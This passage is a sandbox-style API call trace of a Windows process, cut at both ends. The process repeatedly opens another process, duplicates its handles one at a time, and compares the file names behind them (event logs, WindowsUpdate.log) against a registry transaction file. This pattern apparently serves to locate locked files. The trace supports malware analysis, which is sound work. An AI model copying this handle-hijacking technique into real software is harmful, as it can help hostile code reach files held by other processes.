0x1e4 [0164.146] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.147] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.147] CloseHandle (hObject=0x1e4) returned 1 [0164.147] _wcsicmp (_Str1="\\Microsoft-Windows-User Profile Service%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.147] CloseHandle (hObject=0x194) returned 1 [0164.147] CloseHandle (hObject=0x1e8) returned 1 [0164.147] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.147] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4cc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.148] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.148] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.149] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.149] CloseHandle (hObject=0x1e4) returned 1 [0164.149] _wcsicmp (_Str1="\\Microsoft-Windows-BranchCacheSMB%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.149] CloseHandle (hObject=0x194) returned 1 [0164.149] CloseHandle (hObject=0x1e8) returned 1 [0164.149] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.150] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4e4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.150] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.150] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.151] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.151] CloseHandle (hObject=0x1e4) returned 1 [0164.151] _wcsicmp (_Str1="\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.151] CloseHandle (hObject=0x194) returned 1 [0164.151] CloseHandle (hObject=0x1e8) returned 1 [0164.151] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.151] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4ec, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.151] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.152] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.153] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.153] CloseHandle (hObject=0x1e4) returned 1 [0164.153] _wcsicmp (_Str1="\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.153] CloseHandle (hObject=0x194) returned 1 [0164.153] CloseHandle (hObject=0x1e8) returned 1 [0164.153] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.153] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x504, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.153] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.154] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.155] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.155] CloseHandle (hObject=0x1e4) returned 1 [0164.155] _wcsicmp (_Str1="\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.155] CloseHandle (hObject=0x194) returned 1 [0164.155] CloseHandle (hObject=0x1e8) returned 1 [0164.155] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.155] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x598, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.155] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.156] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.157] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.157] CloseHandle (hObject=0x1e4) returned 1 [0164.157] _wcsicmp (_Str1="\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.157] CloseHandle (hObject=0x194) returned 1 [0164.157] CloseHandle (hObject=0x1e8) returned 1 [0164.157] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.157] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.157] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.158] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.159] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.159] CloseHandle (hObject=0x1e4) returned 1 [0164.159] _wcsicmp (_Str1="\\Microsoft-Windows-NCSI%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.159] CloseHandle (hObject=0x194) returned 1 [0164.159] CloseHandle (hObject=0x1e8) returned 1 [0164.159] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.159] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.159] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.160] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.160] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.161] CloseHandle (hObject=0x1e4) returned 1 [0164.161] _wcsicmp (_Str1="\\Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.161] CloseHandle (hObject=0x194) returned 1 [0164.161] CloseHandle (hObject=0x1e8) returned 1 [0164.161] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.161] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5b8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.161] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.161] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.162] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.162] CloseHandle (hObject=0x1e4) returned 1 [0164.162] _wcsicmp (_Str1="\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.162] CloseHandle (hObject=0x194) returned 1 [0164.162] CloseHandle (hObject=0x1e8) returned 1 [0164.162] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.162] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5bc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.162] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.163] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.164] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.164] CloseHandle (hObject=0x1e4) returned 1 [0164.164] _wcsicmp (_Str1="\\Microsoft-Windows-Application-Experience%4Program-Inventory.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.164] CloseHandle (hObject=0x194) returned 1 [0164.165] CloseHandle (hObject=0x1e8) returned 1 [0164.165] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.165] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.165] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.165] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.166] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.166] CloseHandle (hObject=0x1e4) returned 1 [0164.166] _wcsicmp (_Str1="\\Microsoft-Windows-Application-Experience%4Problem-Steps-Recorder.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.166] CloseHandle (hObject=0x194) returned 1 [0164.166] CloseHandle (hObject=0x1e8) returned 1 [0164.166] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.166] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.166] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.167] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.168] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.168] CloseHandle (hObject=0x1e4) returned 1 [0164.168] _wcsicmp (_Str1="\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Troubleshooter.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.168] CloseHandle (hObject=0x194) returned 1 [0164.168] CloseHandle (hObject=0x1e8) returned 1 [0164.168] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.168] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5cc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.168] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.169] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.170] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.170] CloseHandle (hObject=0x1e4) returned 1 [0164.170] _wcsicmp (_Str1="\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.170] CloseHandle (hObject=0x194) returned 1 [0164.170] CloseHandle (hObject=0x1e8) returned 1 [0164.170] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.170] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5d0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.170] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.171] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.172] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.172] CloseHandle (hObject=0x1e4) returned 1 [0164.172] _wcsicmp (_Str1="\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.172] CloseHandle (hObject=0x194) returned 1 [0164.172] CloseHandle (hObject=0x1e8) returned 1 [0164.172] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.172] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5e0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.172] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.173] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.174] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.174] CloseHandle (hObject=0x1e4) returned 1 [0164.174] _wcsicmp (_Str1="\\Microsoft-Windows-NetworkProfile%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.174] CloseHandle (hObject=0x194) returned 1 [0164.174] CloseHandle (hObject=0x1e8) returned 1 [0164.174] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.175] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5e8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.175] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.176] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.176] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.176] CloseHandle (hObject=0x1e4) returned 1 [0164.177] _wcsicmp (_Str1="\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.177] CloseHandle (hObject=0x194) returned 1 [0164.177] CloseHandle (hObject=0x1e8) returned 1 [0164.177] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.177] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x600, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.177] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.178] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.182] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.182] CloseHandle (hObject=0x1e4) returned 1 [0164.182] _wcsicmp (_Str1="\\Microsoft-Windows-NetworkAccessProtection%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.182] CloseHandle (hObject=0x194) returned 1 [0164.182] CloseHandle (hObject=0x1e8) returned 1 [0164.182] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.182] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x62c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.182] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.187] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.188] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.188] CloseHandle (hObject=0x1e4) returned 1 [0164.188] CloseHandle (hObject=0x194) returned 1 [0164.188] CloseHandle (hObject=0x1e8) returned 1 [0164.188] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.189] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x634, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.189] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.189] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.190] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.190] CloseHandle (hObject=0x1e4) returned 1 [0164.191] CloseHandle (hObject=0x194) returned 1 [0164.191] CloseHandle (hObject=0x1e8) returned 1 [0164.191] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.191] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x64c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.191] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.192] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.194] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.195] CloseHandle (hObject=0x1e4) returned 1 [0164.195] _wcsicmp (_Str1="\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.195] CloseHandle (hObject=0x194) returned 1 [0164.195] CloseHandle (hObject=0x1e8) returned 1 [0164.195] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.195] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x650, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.195] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.196] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.198] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.199] CloseHandle (hObject=0x1e4) returned 1 [0164.199] _wcsicmp (_Str1="\\Microsoft-Windows-WindowsBackup%4ActionCenter.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.199] CloseHandle (hObject=0x194) returned 1 [0164.199] CloseHandle (hObject=0x1e8) returned 1 [0164.199] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.199] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x67c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.199] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.200] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.202] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.202] CloseHandle (hObject=0x1e4) returned 1 [0164.202] _wcsicmp (_Str1="\\wkssvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.202] CloseHandle (hObject=0x194) returned 1 [0164.202] CloseHandle (hObject=0x1e8) returned 1 [0164.202] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.202] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x6ac, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.202] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.203] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.205] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.205] CloseHandle (hObject=0x1e4) returned 1 [0164.205] _wcsicmp (_Str1="\\WindowsUpdate.log", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.205] CloseHandle (hObject=0x194) returned 1 [0164.205] CloseHandle (hObject=0x1e8) returned 1 [0164.205] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.205] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x6d8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.205] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.207] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.208] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.208] CloseHandle (hObject=0x1e4) returned 1 [0164.208] _wcsicmp (_Str1="\\Microsoft-Windows-Windows Defender%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.208] CloseHandle (hObject=0x194) returned 1 [0164.208] CloseHandle (hObject=0x1e8) returned 1 [0164.208] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.208] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x6dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.208] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.208] WaitForSingleObject 